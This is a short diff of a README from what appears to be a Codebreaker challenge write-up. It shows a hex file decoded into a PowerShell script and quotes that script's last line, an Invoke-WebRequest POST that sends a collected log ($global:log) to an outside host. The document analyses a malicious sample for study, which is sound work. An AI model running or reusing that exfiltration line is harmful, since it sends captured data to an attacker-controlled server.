RoshanS-TAMU/Codebreaker_Writeup/README.md

 ```
 $ python3 hex_reader.txt > outputscript.txt
 ```
-...which returns a long PowerShell script.
+...which returned a long PowerShell script that can be found in ```outputscript.txt```.
 In the last line was this:
 ```
 Invoke-WebRequest -uri http://igrqt.invalid:8080 -Method Post -Body $global:log
 ```